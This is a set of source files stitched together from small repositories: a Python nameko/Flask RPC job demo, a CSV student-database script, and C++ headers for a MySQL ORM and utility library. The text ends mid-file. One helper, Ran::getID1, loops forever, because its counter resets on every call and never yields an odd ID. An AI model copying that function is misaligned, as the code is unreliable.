from nameko.standalone.rpc import ClusterRpcProxy
def call_rpc(**kwargs):
config = {
'AMQP_URI': kwargs.get('amqp_uri')
}
with ClusterRpcProxy(config) as cluster_rpc:
service = getattr(cluster_rpc, kwargs.get('service'))
method = getattr(service, kwargs.get('method'))
return json.loads(method(json.dumps(kwargs.get('parameters', {}))))
def call_all_rpc(*workers) -> list:
pool = ThreadPool(len(workers))
results = []
for worker in workers:
results.append(pool.apply_async(call_rpc, kwds=worker))
pool.close()
pool.join()
results = [r.get() for r in results]
return results
<file_sep>This project uses Python 3
# Structure
* http_server: HTTP REST API; accepts batched job parameters; the task producer
* rpc_worker: task consumers; three services job1/2/3, which delay 1/2/3 seconds respectively
# Getting started
1. Message queue: you can create a RabbitMQ container with Docker: `docker run -d -p 5672:5672 rabbitmq:3`
2. rpc_worker: `nameko run rpc_worker`
3. http_server: `python http_server.py`
# Tests
* job1 x 1, ~1 second
```shell
curl --location -s -w %{time_total} --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
}
]
}'
```
* job1 x 2, ~1 second
```shell
curl --location -s -w %{time_total} --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
}
]
}'
```
* job1 x 1 + job2 x 3 + job3 x 1, ~3 seconds
```shell
curl --location -s -w %{time_total} --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job3",
"parameters": {
"a": 1,
"b": 2
}
}
]
}'
```
<file_sep># HTTP server: receives jobs and invokes workers concurrently
from flask import Flask, request
from utils import call_all_rpc
class Config:
# RPC worker configuration
WORKERS = {
# job code, passed by the client when calling
'job1': {
# the worker's message broker, service name, and method name
'amqp_uri': 'pyamqp://guest:guest@localhost',
'service': 'service_job_1',
'method': 'execute',
},
'job2': {
'amqp_uri': 'pyamqp://guest:guest@localhost',
'service': 'service_job_2',
'method': 'execute',
},
'job3': {
'amqp_uri': 'pyamqp://guest:guest@localhost',
'service': 'service_job_3',
'method': 'execute',
},
}
app = Flask(__name__)
app.config.from_object(Config)
@app.route('/execute/', methods=['POST'])
def execute():
"""Execute jobs
Invocation:
curl --location --request POST 'localhost:5000/execute/' \
--header 'Content-Type: application/json' \
--data-raw '{
"jobs": [
{
"job": "job1",
"parameters": {
"a": 1,
"b": 2
}
},
{
"job": "job2",
"parameters": {
"a": 3,
"b": 4
}
}
]
}'
:return:
"""
data = request.json # type: dict
if not data:
return {'code': 'ParameterError', 'message': 'Json required.'}
jobs = data.get('jobs', [])
workers = []
for job in jobs:
code = job.get('job')
# look up the worker for the client's job code
worker = app.config.get('WORKERS').get(code)
if not worker:
return {'code': 'ParameterError', 'message': 'Invalid job code.'}
# copy the worker config and attach the job parameters, so the shared WORKERS entry is not mutated
worker = dict(worker, parameters=job.get('parameters', {}))
workers.append(worker)
results = call_all_rpc(*workers)
return {'code': 'Success', 'data': results}
if __name__ == '__main__':
app.run(debug=True)
<file_sep># RPC workers: job1/2/3 simulate business logic
import json
import time
from nameko.rpc import rpc
class ServiceJob1:
name = "service_job_1"
@rpc
def execute(self, parameter: str) -> str:
try:
json_parameter = json.loads(parameter)
except Exception:
return json.dumps({'code': 'ParameterError'})
data = {
'parameter': json_parameter,
'service': self.name,
}
print(f'service: {self.name} get job: {parameter}')
time.sleep(1)
return json.dumps({'code': 'Success', 'data': data})
class ServiceJob2:
name = "service_job_2"
@rpc
def execute(self, parameter: str) -> str:
try:
json_parameter = json.loads(parameter)
except Exception:
return json.dumps({'code': 'ParameterError'})
data = {
'parameter': json_parameter,
'service': self.name,
}
print(f'service: {self.name} get job: {parameter}')
time.sleep(2)
return json.dumps({'code': 'Success', 'data': data})
class ServiceJob3:
name = "service_job_3"
@rpc
def execute(self, parameter: str) -> str:
try:
json_parameter = json.loads(parameter)
except Exception:
return json.dumps({'code': 'ParameterError'})
data = {
'parameter': json_parameter,
'service': self.name,
}
print(f'service: {self.name} get job: {parameter}')
time.sleep(3)
return json.dumps({'code': 'Success', 'data': data})
<file_sep>flask==1.1.2
nameko==2.12.0
|
4ede564ec71b0229b9e09bc3f2eb891afb4f57c1
|
[
"Markdown",
"Python",
"Text"
] | 5 |
Python
|
aishenghuomeidaoli/nameko_demo
|
37fcaa5b9321e18abfc62d887962693e0de07e0e
|
4ed6d655afca0ea8863a7952f08cc5212c4655cb
|
refs/heads/main
|
<repo_name>helmarIsrael/ssid<file_sep>/Database.py
import csv
import pandas
import os
column_names = ["Student ID","Name","Year Level","Gender","Course"] #the columns of the csv
# create the file with a header row if it is missing or empty (getsize raises if the file does not exist)
if not os.path.exists("student_database.csv") or os.path.getsize("student_database.csv") == 0:
with open("student_database.csv", mode="w", newline="") as student_database: #write the columns first
student_list = csv.writer(student_database, delimiter=",")
student_list.writerow(column_names)
def cls():
print("\n" * 100)
def view_student(): #this function will show the list of students input by the user
df_csv = pandas.read_csv("student_database.csv", delimiter=",")
print(df_csv)
input("Press enter to return to main menu...")
def add_student(): #this function will allow user to add students
print("Input student ID: ")
id = input()
print("Input name: ")
name = input()
print("Year level: ")
year_level = input()
print("Gender [M, F, LGBTQ]: ")
gender = input().upper()
print("Course: ")
course = input().upper()
with open("student_database.csv", mode="a", newline="") as student_database:
student_list = csv.writer(student_database)
student_list.writerow([id, name, year_level, gender, course])
print("Student added!")
input("Press enter to return to main menu...")
def edit_student(): #this function allows the user to change the values of the student eg. name, gender, etc.
#it does not support student id change so to change the student id, one must delete the student and create a new one.
print("Enter the student ID number to edit value: ")
edit = input()
df = pandas.read_csv("student_database.csv", dtype=str)
matches = df["Student ID"] == edit
if not matches.any():
print("ID not found")
input("Press enter to return to main menu...")
return
print(df[matches].to_string(index=False))
print("What value will you change?\n"
"1. Name\n"
"2. Year Level\n"
"3. Gender\n"
"4. Course\n"
"Note: To change Student ID, delete the ID number and add a new one.")
columns = {"1": "Name", "2": "Year Level", "3": "Gender", "4": "Course"}
column = columns.get(input())
if column is None:
print("Wrong Value")
else:
print("Input a new value for " + column + ": ")
df.loc[matches, column] = input()
df.to_csv("student_database.csv", index=False)
print("Done.")
input("Press enter to return to main menu...")
def delete_student(): #this will allow for the user to delete the student in the list using the student ID
print("Input Student ID:")
id = input()
df = pandas.read_csv("student_database.csv", dtype=str)
matches = df["Student ID"] == id
if matches.any():
df[~matches].to_csv("student_database.csv", index=False)
print("Successfully deleted!")
else:
print("No Student ID found.")
input("Press enter to return to main menu...")
def find(): #this function will find the student based on its student ID
print("Enter Student ID number: ")
id = input()
df = pandas.read_csv("student_database.csv", dtype=str)
matches = df[df["Student ID"] == id]
if not matches.empty:
print(matches.to_string(index=False))
else:
print("No Student ID found.")
input("Press enter to return to main menu...")
def exit(): #this function will end the program
print("Goodbye")
quit()
while True:
print("----------------")
print("Student Database")
print("1. View Students Information\n"
"2. Add a student\n"
"3. Edit student\n"
"4. Delete a student\n"
"5. Find Student ID\n"
"6. Exit\n"
"\n"
"Input: ")
selection = input()
if selection == "1":
view_student()
cls()
elif selection == "2":
add_student()
cls()
elif selection == "3":
edit_student()
cls()
elif selection == "4":
delete_student()
cls()
elif selection == "5":
find()
cls()
elif selection == "6":
exit()
else:
print("Please select the desired values...")<file_sep>/README.md
# ssid
GUI is still in progress.
The program provides the basic database features students need.
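The edit and delete flows in `Database.py` reduce to the same round-trip: load the CSV, match rows on the `Student ID` column, patch or drop them, then rewrite the file. A minimal sketch of that round-trip with only the standard `csv` module (the sample rows are illustrative):

```python
import csv
import io

rows = [["Student ID", "Name", "Course"],
        ["101", "Ana", "BSCS"],
        ["102", "Ben", "BSIT"]]

def update_field(rows, student_id, column, value):
    # rows[0] is the header; find the column index, then patch matching rows
    idx = rows[0].index(column)
    found = False
    for row in rows[1:]:
        if row[0] == student_id:
            row[idx] = value
            found = True
    return found

update_field(rows, "102", "Course", "BSCS")

# round-trip through CSV text, as Database.py does through the file
buf = io.StringIO()
csv.writer(buf).writerows(rows)
reloaded = list(csv.reader(io.StringIO(buf.getvalue())))
print(reloaded[2])  # ['102', 'Ben', 'BSCS']
```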
|
35b1a6cddf81b7d88f3ce7f2b030ff59e31dd718
|
[
"Markdown",
"Python"
] | 2 |
Python
|
helmarIsrael/ssid
|
fb9c292c33624a83fe501da5117fe6c21f878292
|
9c3b287ee70527da794c67220528b38593cd3625
|
refs/heads/master
|
<file_sep>#!/usr/bin/env bash
# Build an mfsbsd image, dd the image to a USB stick, then boot the box with the stick. Add pv to the pipe if you want timing, speed, and size.
# This should work on a Rackspace account, in any datacenter.
ACCOUNT=${1:-default}
IMAGE=f0b8595d-128e-4514-a5cc-847429dcfa6b
FLAVOR=performance1-8
NAME=explition-freebsd-builder-`date +%s`
# ##you provide these##
baker.sh $ACCOUNT $IMAGE $FLAVOR "base.sh rc.conf packages" "" $NAME
<file_sep>Explition FreeBSD base image
============================
Sources
=======
* mfsbsd
* FreeBSD 10-STABLE
Defaults
========
* Login: root/root
Configuration
=============
* packages file: Space-separated list of packages you want installed (fetched via pkgng, so they must be in ports). Dependency listing is not necessary.
* rc.conf file: If you want a custom rc.conf, this is the place to do it.
* make.conf: We don't build the ports (yet), but this can be used to help fine-tune the base system.
|
665b60512b2bcf2541cfd5782b9f88501de96878
|
[
"Markdown",
"Shell"
] | 2 |
Shell
|
explition/freebsd
|
06c2d2c2fd53266516ee6496de0e6bbaf873dba0
|
d1a035ba3035b0bd75c7e7117d34036135b8ed95
|
refs/heads/main
|
<repo_name>135356/BBMySQL<file_sep>/README.md
# MysqlOrm
###### MySQL database mapping; will keep being updated if people follow the project (install *MySQL 8* before running this project)
> Please download the prebuilt content from the Releases section (all platforms supported: Windows, Linux, iOS), unpack it, edit ./main.cpp, then build with CMake and run. If you run into problems, feel free to reach out: <EMAIL>
### Video demo (1.0 branch)
> [bilibili.com/video/BV1ey4y1L7UR/](https://www.bilibili.com/video/BV1ey4y1L7UR/)
### Database configuration file:
> *./build/bb_mysql_orm_config.conf*
### Exception log file:
> *./build/bb.log*
### Example mode file:
> *Location: ./include/mode/dbA1_test.hpp*
> A mode class inherits from dql (gaining all of its methods); its class name determines the database and table to create, and the class performs INSERT, DELETE, UPDATE and SELECT against that table
> The underscore separates database from table
> Capital letters are converted to underscores, e.g. dbA1_aaaBbb becomes [database: db_a1, table: aaa_bbb]
#### Example (main.cpp):
```c++
#include "mode/dbA1_test.hpp"
int main() {
//show rows from table test in database db_a1 where id > 1
dbA1_test::obj().where("id",">","1")->show();
//insert into db_a1.test: id auto-increments, column a1 = 123, column a2 = abc
dbA1_test::obj().insert({{"a1","123"},{"a2","abc"}});
return 0;
}
```
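The naming rule above — the underscore splits database from table, and each capital letter becomes an underscore plus its lowercase form — can be sketched as follows (the function name here is illustrative, not part of the library):

```python
import re

def split_mode_name(name):
    # "dbA1_aaaBbb" -> ("db_a1", "aaa_bbb"): split on the first underscore,
    # then turn each capital letter into "_" + its lowercase form
    db, table = name.split("_", 1)
    snake = lambda s: re.sub(r"[A-Z]", lambda m: "_" + m.group(0).lower(), s)
    return snake(db), snake(table)

print(split_mode_name("dbA1_test"))    # ('db_a1', 'test')
print(split_mode_name("dbA1_aaaBbb"))  # ('db_a1', 'aaa_bbb')
```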
<file_sep>/build/mysql_orm/include/mysql_orm/sql/ddl.h
//
// Created by 邦邦 on 2022/4/17.
//
#ifndef MYSQLORM_DDL_H
#define MYSQLORM_DDL_H
#include <map>
#include <vector>
#include <array>
#include <string>
#include <cstring>
#include "bb/Log.h"
#include "mysql.h"
namespace bb {
class ddl {
ddl();
~ddl();
protected:
std::string config_path_ = "./bb_mysql_orm_config.conf"; //configuration file
std::map<std::string, std::string> config; //database configuration info
int initMysql(std::string &host, std::string &user, std::string &password, std::string &port, std::string &unix_socket, std::string &client_flag);
public:
std::vector<MYSQL> connect{}; //MySQL TCP connections
unsigned dql_index{}; //load-balancing index, round-robin between servers; only DQL needs to switch, and only on construction (the same user is not switched)
static ddl &obj(); //singleton
};
}
#endif //MYSQLORM_DDL_H
<file_sep>/build/mysql_orm/include/mysql_orm/mode/dbA1_test.hpp
//
// Created by 邦邦 on 2022/4/26.
//
#ifndef MYSQLORM_DBA1_TEST_HPP
#define MYSQLORM_DBA1_TEST_HPP
#include "sql/dql.h"
class dbA1_test:public bb::dql{
dbA1_test(){
if(run_() != 0){
bb::Log::obj().error("problem while creating the mode");
}
update_();
}
public:
static dbA1_test &obj(){
static dbA1_test dbA1_test;
return dbA1_test;
}
protected:
int run_(){
std::array<std::string,2> obj_info = getName_();
DB_name_ = obj_info[0];
table_name_ = obj_info[1];
if(createDB(DB_name_) == 0 && useDB(DB_name_) == 0){
if(isTable(table_name_) == 0){
if(create_() != 0){return -1;}
}
return useTable(table_name_);
}
return 0;
}
int create_(){
return createTable(table_name_,[](auto *data){
data->int_("a1")->default_(123)->comment_("注释");
data->string_("a2")->nullable_();
data->dateAt_();
});
}
void update_(){
//delDB_("db_a1");
}
void delTable_(const std::string &db_name={},const std::string &table_name={}){
if(!db_name.empty()){
DB_name_ = db_name;
}
if(!table_name.empty()){
table_name_ = table_name;
}
useDB(DB_name_);
delTable();
}
void delDB_(const std::string &db_name={}){
if(!db_name.empty()){
DB_name_ = db_name;
}
delDB(DB_name_);
}
};
#endif //MYSQLORM_DBA1_TEST_HPP
<file_sep>/build/bb/include/bb/tcp/S_Epoll.h
// Cross-platform epoll
// Created by 邦邦 on 2022/6/17.
//
#ifndef BB_S_EPOLL_H
#define BB_S_EPOLL_H
#include <cstring>
#include <csignal> //kill
#include <functional>
#include "bb/Log.h"
#include "IpTcp.h"
#include "bb/FloodIP.hpp"
namespace bb {
class S_Epoll {
IpTcp *tcp_{};
const unsigned short EPOLL_MAX_SIZE{2000}; //maximum number of epoll fds
//add an epoll event (register the event in the kernel event table)
bool addEventF_(int &epoll_fd,int &client_fd,uint32_t &client_ip,const unsigned &events);
//remove an epoll event
bool deleteEventF_(int &epoll_fd, int &client_fd);
//modify an epoll event
bool modifyEventF_(int &epoll_fd, int &client_fd,const unsigned &events);
public:
S_Epoll(const int &port,const unsigned &timeout){
tcp_ = new IpTcp({}, port,timeout);
}
~S_Epoll(){
delete tcp_;
}
//run the epoll loop
void runF(const std::function<bool(int &client_fd,unsigned &client_ip)> &f);
};
}
#endif //BB_S_EPOLL_H
<file_sep>/build/bb/include/bb/http/Serve.h
#ifndef BB_SERVE_H
#define BB_SERVE_H
#include <map>
#include <string>
#include <regex>
#include "bb/file.h"
#include "bb/tcp/IpTcp.h"
#include "bb/tcp/S_Epoll.h"
#include "Analyze.h"
#include "Config.hpp"
#include "bb/Token.h"
namespace bb{
namespace http{
struct Serve{
int client_fd{}; //client fd
Analyze *info{}; //parsed HTTP header info
char r_buf[Config::RECF_MAX]{}; //receive buffer
ssize_t r_size{}; //size of the received data
Serve(int &fd);
~Serve();
//send data (headers and body)
bool sendF(const std::string &method,std::string &data,size_t &size);
//send response headers only
bool sendF(const std::string &method,const std::string &state,const std::string &type="html",const size_t &size={},const bool &is_gzip=false,const bool &is_cache=false);
//serve a page request
bool sendHtml();
//receive JSON-formatted data
bool recvJson(std::map<std::string, std::string> &r_data);
//client uploads a file
bool recvFile(std::string &token);
//client downloads a file
bool sendFile(std::string &token);
};
}
}
#endif<file_sep>/build/bb/include/bb/pool_wait.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_POOL_WAIT_H
#define BB_POOL_WAIT_H
#include <vector>
#include <list>
#include <mutex>
#include <future>
#include <thread>
#include <functional>
namespace bb{ //once all threads are blocked, queued tasks run as soon as a thread frees up
class pool_wait{
struct task_list{
task_list():lock(mutex,std::defer_lock){}
std::thread thread{};
std::mutex mutex{};
std::unique_lock<std::mutex> lock;
std::condition_variable condition{};
std::list<std::function<void()>> task{};
};
unsigned short index{}; //current index
unsigned short work_max; //maximum number of threads
std::vector<task_list> f_list{}; //tasks
size_t run_size{}; //number of running tasks
bool state_ = true; //when false, stop blocking
explicit pool_wait(const unsigned short &max=3);
~pool_wait();
void run(unsigned short &i);
void push(const std::function<void()> &f,unsigned short i);
public:
static pool_wait &obj(const unsigned short &max=3);
void push(const std::function<void()> &f);
void close();
};
}
#endif //BB_POOL_WAIT_H
<file_sep>/main.cpp
#include "mode/dbA1_test.hpp"
int main() {
dbA1_test::obj().where("id",">","0")->show();
return 0;
}<file_sep>/build/mysql_orm/include/mysql_orm/sql/dml_type.h
// Data types
// Created by 邦邦 on 2022/4/18.
//
#ifndef MYSQLORM_DML_TYPE_H
#define MYSQLORM_DML_TYPE_H
#include <vector>
#include <array>
#include <string>
#include "bb/Log.h"
namespace bb {
class dml_type {
protected:
std::vector<std::array<std::string, 6>> sql_arr_; //SQL column descriptors {key,"TINYINT type","3 length","3 precision","NOT NULL extras","1 = redis index"}
std::vector<std::string> sql_other_; //special entries such as INDEX (c2,c3)
public:
//TINYINT: -2^7 to 2^7-1 (-128 to 127), unsigned 0 to 255; default display width 4; 1 byte
dml_type *tinyint_(const std::string &key);
dml_type *tinyint_(const std::string &key, const int &size);
//SMALLINT: -2^15 to 2^15-1 (-32768 to 32767), unsigned 0 to 65535; default display width 6; 2 bytes
dml_type *smallint_(const std::string &key);
dml_type *smallint_(const std::string &key, const int &size);
//MEDIUMINT: -8388608 to 8388607, unsigned 0 to 16777215; default display width 9; 3 bytes
dml_type *mediumint_(const std::string &key);
dml_type *mediumint_(const std::string &key, const int &size);
//INT: -2^31 to 2^31-1 (-2147483648 to 2147483647), unsigned 0 to 4294967295; default display width 11; 4 bytes
dml_type *int_(const std::string &key);
dml_type *int_(const std::string &key, const int &size);
//BIGINT: -2^63 to 2^63-1 (-9223372036854775808 to 9223372036854775807), unsigned 0 to 18446744073709551615; default display width 20; 8 bytes
dml_type *bigint_(const std::string &key);
dml_type *bigint_(const std::string &key, const int &size);
//FLOAT: 4 bytes (32 bit), range -3.4E38 to 3.4E38 (7 significant digits); at most 21 digits left of the point and 4 to the right; extra fractional digits are truncated
dml_type *float_(const std::string &key);
dml_type *float_(const std::string &key, const int &size);
//precision = number of digits after the decimal point
dml_type *float_(const std::string &key, const int &size, const int &precision);
//DOUBLE: 8 bytes (64 bit), range -1.7E308 to 1.7E308 (15 significant digits)
dml_type *double_(const std::string &key);
dml_type *double_(const std::string &key, const int &size);
dml_type *double_(const std::string &key, const int &size, const int &precision);
//DECIMAL: 128 bit with no precision loss; commonly used for bank account arithmetic (28 significant digits)
dml_type *decimal_(const std::string &key);
dml_type *decimal_(const std::string &key, const int &size);
dml_type *decimal_(const std::string &key, const int &size, const int &precision);
//string type, 256 bytes
dml_type *string_(const std::string &key);
dml_type *string_(const std::string &key, const int &size);
//text type, 65,535 bytes
dml_type *text_(const std::string &key);
//date-time type, YYYY-MM-DD HH:MM:SS
dml_type *date_(const std::string &key);
//created-at + updated-at columns
dml_type *dateAt_();
//unsigned
dml_type *unsigned_();
//unique
dml_type *unique_();
//allow null
dml_type *nullable_();
//default value
dml_type *default_(const std::string &value);
dml_type *default_(const int &value);
//column comment
dml_type *comment_(const std::string &value);
//zero-fill to a fixed width: 123 = 0000000123
dml_type *zerofill_();
//create an index; full-text indexes only support char, varchar and text
dml_type *index_(const short &is_unique = 0);
dml_type *index_(const std::vector<std::string> &key_list, const short &is_unique = 0);
//mark as a non-relational (NoSQL) data index
dml_type *NoSQL_();
};
}
#endif //MYSQLORM_DML_TYPE_H
<file_sep>/build/bb/include/bb/FloodIP.hpp
//
// Created by 邦邦 on 2022/6/28.
//
#ifndef BB_FLOODIP_H
#define BB_FLOODIP_H
#include "Flood.h"
struct FloodIP{
bb::Flood a10;
bb::Flood a20;
bb::Flood b10;
bb::Flood b20;
static FloodIP &obj(){
static FloodIP bb_flood_id;
return bb_flood_id;
}
private:
FloodIP():a10(3600,10),a20(3600,20),b10(1800,10),b20(1800,20){}
~FloodIP()=default;
};
#endif //BB_FLOODIP_H
<file_sep>/build/bb/include/bb/pool.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_POOL_H
#define BB_POOL_H
#include <vector>
#include <list>
#include <mutex>
#include <future>
#include <thread>
#include <functional>
#include "pool_wait.h"
namespace bb{
class pool{
struct task_list{
task_list():lock(mutex,std::defer_lock){}
std::thread thread{};
std::mutex mutex{};
std::unique_lock<std::mutex> lock;
std::condition_variable condition{};
std::list<std::function<void()>> task{};
};
unsigned short index{}; //current index
unsigned short work_max; //maximum number of threads
std::vector<task_list> f_list{}; //tasks
bool state_ = true; //when false, stop blocking
explicit pool(const unsigned short &max=3);
~pool();
void run(unsigned short &i);
public:
static pool &obj(const unsigned short &max=3);
//once all threads are blocked, queued tasks run as soon as a thread frees up
static pool_wait &objWait(const unsigned short &max=3);
void push(const std::function<void()> &f);
void close();
};
}
#endif //BB_POOL_H
<file_sep>/build/bb/include/bb/Time.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_TIME_H
#define BB_TIME_H
#include <thread>
namespace bb{
class Time{
static void test_(const int &second){
//process_time/60 //minutes between then and now
//process_time/3600 //hours between then and now (60*60)
//process_time/86400 //days between then and now (60*60*24)
std::this_thread::sleep_for(std::chrono::hours(second)); //hours
std::this_thread::sleep_for(std::chrono::minutes(second)); //minutes
std::this_thread::sleep_for(std::chrono::seconds(second)); //seconds
std::this_thread::sleep_for(std::chrono::milliseconds(second)); //milliseconds
std::this_thread::sleep_for(std::chrono::microseconds(second)); //microseconds
std::this_thread::sleep_for(std::chrono::nanoseconds(second)); //nanoseconds
}
public:
static void sleep(const int &second);
//current timestamp, in seconds since 1970-01-01
static time_t getTime();
//current date/time in the given format (year, month, day, time)
static std::string getDate(const char format[]="%Y-%m-%d %H:%M:%S",const time_t &target_time=time(nullptr));
//time elapsed between the target time and now, human readable
static std::string getDateAuto(const time_t &target_time=0);
};
}
#endif //BB_TIME_H
<file_sep>/build/bb/include/bb/Ran.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_RAN_H
#define BB_RAN_H
#ifdef _MSC_VER
#elif __APPLE__
#include <uuid/uuid.h>
#elif __linux__
#endif
#include <algorithm> //needed for shuffle
#include <string>
#include <random>
#include <array>
namespace bb{
class Ran{
public:
//random integer
static unsigned getInt(const unsigned &min={},const unsigned &max={});
//random string
static std::string getString(const unsigned &min_number={},const unsigned &max_number={});
//random Chinese characters
static std::string getZh(const unsigned &min_number={},const unsigned &max_number={});
//generate a machine-unique ID with uuid
//char dst[37]{};
static char *getID(char *dst){
#ifdef _MSC_VER
/*char buffer[64] = { 0 };
GUID guid;
if(CoCreateGuid(&guid)){
fprintf(stderr, "create guid error ");
return '';
}
_snprintf(buffer, sizeof(buffer),
"%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X",
guid.Data1, guid.Data2, guid.Data3,
guid.Data4[0], guid.Data4[1], guid.Data4[2],
guid.Data4[3], guid.Data4[4], guid.Data4[5],
guid.Data4[6], guid.Data4[7]);
return buffer;*/
#elif __APPLE__
uuid_t uu;
uuid_generate(uu);
uuid_unparse(uu,dst);
return dst;
#elif __linux__
#endif
return nullptr;
}
//random numbers without repeats
static std::vector<int> getIntArr(const unsigned &max){
//build an array holding the numbers 0 to max
std::vector<int> arr{};arr.reserve(max);for(unsigned i=0;i<max;i++){arr.push_back(i);}
//shuffle the array randomly
std::shuffle(arr.begin(),arr.end(),std::mt19937(std::random_device()()));
return arr;
}
//generate a unique ID
static unsigned long long getID1(unsigned int server_id){
//get a globally unique ID; server_id identifies the service, to tell apart copies of the same service deployed on multiple servers
auto getUniqueId = [](unsigned int server_id){
unsigned long long seq_id = 0;
unsigned long long seq = seq_id++ ;
seq = (seq<<8);
seq = (seq>>8);
unsigned long long tag =((unsigned long long)server_id<<56);
seq = (seq | tag);
return seq;
};
//get a globally unique ID that is odd
unsigned long long id = getUniqueId(server_id);
while(true){
if((id & 0x01) == 0x01){
return id;
}else{
id = getUniqueId(server_id);
}
}
}
//concatenate two numbers
static long long append(int x, int y){
long long sum = 0;
int mid = y;
sum += x * 10;
for(;mid/=10;sum*=10);
sum += y;
return sum;
}
};
}
#endif //BB_RAN_H<file_sep>/build/bb/include/bb/tcp/IpTcp.h
// TCP/IP protocol
// Created by 邦邦 on 2022/6/17.
//
#ifndef BB_IPTCP_H
#define BB_IPTCP_H
#include <arpa/inet.h> //byte-order conversion
#include <unistd.h> //close() for file descriptors
#include <netinet/in.h> //socket address structures
#include <thread>
#include <vector>
#include "bb/Log.h"
namespace bb {
class IpTcp{
public:
int socket_{}; //socket
struct sockaddr_in addr_{}; //address structure
explicit IpTcp(const std::string &ip, const int &port,const unsigned &timeout=0);
~IpTcp();
/** Configure the address structure
* ip={} means the local ip
* port=0: do not bind a port; port=1: bind the preset port; port>1: bind the given port
* type=4: IPv4 protocol; type=6: IPv6 protocol
* second>0: set a timeout
* addr_on=0: disallow port reuse; addr_on=1: allow port reuse
* */
void addrF(const std::string &ip={},const int &port=0,const int &type=4,const time_t &second=0,const int &addr_on=0);
};
}
#endif //BB_IPTCP_H
<file_sep>/build/bb/include/bb/ShareMemory.h
#ifndef BB_SHAREMEMORY_H
#define BB_SHAREMEMORY_H
#include <iostream>
#include <cstring>
#include <sys/shm.h>
namespace bb{
struct ShareMemory{
key_t shmkey{};
int shmid{};
void *shmaddr{};
size_t shmsize{1024};
void openKey(const key_t &key=IPC_PRIVATE);
void openId(const int &id);
void close();
//write
void write(void *buf,const size_t &size);
//delete
void del();
//read
void *get();
};
class ShareMemoryKey:public ShareMemory{
ShareMemoryKey(const key_t &key=IPC_PRIVATE,const size_t &size=1024){
shmsize = size;
openKey(key);
}
~ShareMemoryKey(){
close();
}
public:
//key is a negative number
static ShareMemoryKey &obj(const key_t &key=IPC_PRIVATE,const size_t &size=1024){
static ShareMemoryKey bb_share_memory_key(key,size);
return bb_share_memory_key;
}
};
class ShareMemoryId:public ShareMemory{
ShareMemoryId(const int &id){
openId(id);
}
~ShareMemoryId(){
close();
}
public:
static ShareMemoryId &obj(const int &id){
static ShareMemoryId bb_share_memory_id(id);
return bb_share_memory_id;
}
};
}
#endif<file_sep>/build/bb/include/bb/Flood.h
// Flood protection (rate limiting)
// Created by 邦邦 on 2022/6/17.
//
#ifndef BB_FLOOD_H
#define BB_FLOOD_H
#include <string>
#include <map>
#include "bb/Time.h"
namespace bb {
class Flood {
//time/60 //minutes between then and now
//time/3600 //hours between then and now (60*60)
//time/86400 //days between then and now (60*60*24)
bool is_one_rm{};
bool is_two_rm{};
//map of user IPs to visit counts
std::map<uint32_t, unsigned> one;
std::map<uint32_t, unsigned> two;
uint32_t interval_seconds_{}; //within this interval
uint32_t max_number_{}; //maximum number of hits allowed
public:
Flood() = default;
explicit Flood(const uint32_t &interval_seconds = 3600, const uint32_t &max_number = 60);
//add an ip to the queue
void push(uint32_t &s_addr);
//get the visit count
unsigned get(uint32_t &s_addr);
//check whether an ip exceeded the visit limit
bool is(uint32_t &s_addr);
//add the ip and check the visit limit in one call
bool pushIs(uint32_t &s_addr);
};
}
#endif //BB_FLOOD_H
<file_sep>/build/cmake/modules/mysqlConfig.cmake
set(mysql_FOUND TRUE)
#package name
set(PACKAGE_FIND_NAME mysql)
#include path
set(mysql_INCLUDES /usr/local/mysql/include)
#library path
find_library(mysql_LIBS NAMES mysqlclient PATHS /usr/local/mysql/lib)<file_sep>/build/bb/include/bb/ssl/base64.hpp
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_BASE64_H
#define BB_BASE64_H
#include <string>
#include <cstring>
namespace bb{
namespace ssl{
class base64{
public:
static void en(const char src[],std::string &dst){
size_t src_size = strlen(src);dst={};
//the base64 alphabet
char base64_table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
//length of the string after base64 encoding
size_t dst_size{};
if(src_size % 3 == 0){
dst_size = src_size / 3 * 4;
}else{
dst_size = (src_size / 3 + 1) * 4;
}
int i, j;
//char *dst = new char[sizeof(unsigned char) * dst_size + 1]; //heap memory allocated here would have to be freed by the caller, which is easy to forget
for(i = 0, j = 0; i < dst_size - 2; j += 3, i += 4){ //encode in groups of three 8-bit characters
dst += base64_table[src[j] >> 2]; //top 6 bits of the first character, mapped through the table
dst += base64_table[(src[j] & 0x3) << 4 | (src[j + 1] >> 4)]; //bottom 2 bits of the first character combined with the top 4 bits of the second
dst += base64_table[(src[j + 1] & 0xf) << 2 | (src[j + 2] >> 6)]; //bottom 4 bits of the second character combined with the top 2 bits of the third
dst += base64_table[src[j + 2] & 0x3f]; //bottom 6 bits of the third character
}
//handle the final group
switch(src_size % 3){
case 1:
dst[i - 2] = '=';
dst[i - 1] = '=';
break;
case 2:
dst[i - 1] = '=';
break;
}
}
static void de(const char code[],std::string &dst){
//map each character back to its decimal value in the base64 table
char decode64_table[] = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
62, // '+'
0, 0, 0,
63, // '/'
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, // '0'-'9'
0, 0, 0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,
